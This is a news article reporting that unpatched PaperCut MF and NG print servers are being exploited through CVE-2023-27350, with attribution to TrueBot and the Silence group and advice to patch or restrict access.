Print management software provider PaperCut has issued a warning indicating that unpatched servers are being actively exploited in the wild. This alarming announcement follows two vulnerability reports from cybersecurity firm Trend Micro, which highlight significant security lapses within the PaperCut software.
According to PaperCut, an analysis of customer reports revealed the earliest signs of suspicious activity linked to these vulnerabilities emerged on April 14, 2023. The company’s detailed findings point to an increased risk associated with their products, particularly concerning a critical access control flaw cataloged as CVE-2023-27350 by the U.S. Cybersecurity and Infrastructure Security Agency (CISA), which carries a CVSS score of 9.8.
This flaw is now part of CISA’s Known Exploited Vulnerabilities (KEV) catalog, reflecting mounting evidence of active exploitation. The incident raises critical security implications for businesses utilizing PaperCut MF and NG software solutions, as attackers appear to be leveraging these vulnerabilities for unauthorized access.
Huntress, another cybersecurity firm, has reported the discovery of approximately 1,800 publicly exposed PaperCut servers. They detected the execution of PowerShell commands from compromised instances of the software to install remote management tools, thereby enabling persistent control over affected systems. This technical maneuver is likely a tactic aimed at establishing foothold within victim networks, consistent with principles outlined in the MITRE ATT&CK framework, particularly focusing on methods such as initial access and persistence.
Further investigation into the deployed infrastructure revealed that the domain associated with these malicious activities was registered shortly before the vulnerabilities were first reported. This domain not only hosted the exploit tools but has also been linked to malware strains like TrueBot, suggesting a sophisticated and coordinated attack strategy.
TrueBot, attributed to the Russian cybercriminal group known as Silence, has historical connections to other notorious ransomware distributions, including Cl0p. Although it remains unclear if these activities are directly facilitating ransomware deployment, the implications for businesses are significant. Experts cautioned that the exploitation of PaperCut vulnerabilities might serve as a gateway for attackers seeking to execute more damaging payloads within victim networks.
To mitigate these risks, users are advised to upgrade to the latest secured versions of PaperCut MF and NG. Even organizations with internal servers are encouraged to apply these patches promptly, as failure to do so may expose them to ongoing threats. Businesses unable to upgrade should restrict network access to their servers and block inbound connections from external IP addresses, aiming to minimize potential attack vectors.
Additionally, Horizon3.ai, a penetration testing firm, has released a proof-of-concept exploit related to the critical PaperCut flaw, potentially enabling remote code execution. This development underscores the urgency for businesses to fortify their cybersecurity protocols and remain vigilant against evolving threats.
In this rapidly changing landscape of cyber threats, organizations must prioritize security and remain informed on new vulnerabilities and known exploits. The rapid evolution of attack techniques necessitates a proactive approach, leveraging frameworks like MITRE ATT&CK to identify and counteract potential threats before they can be exploited.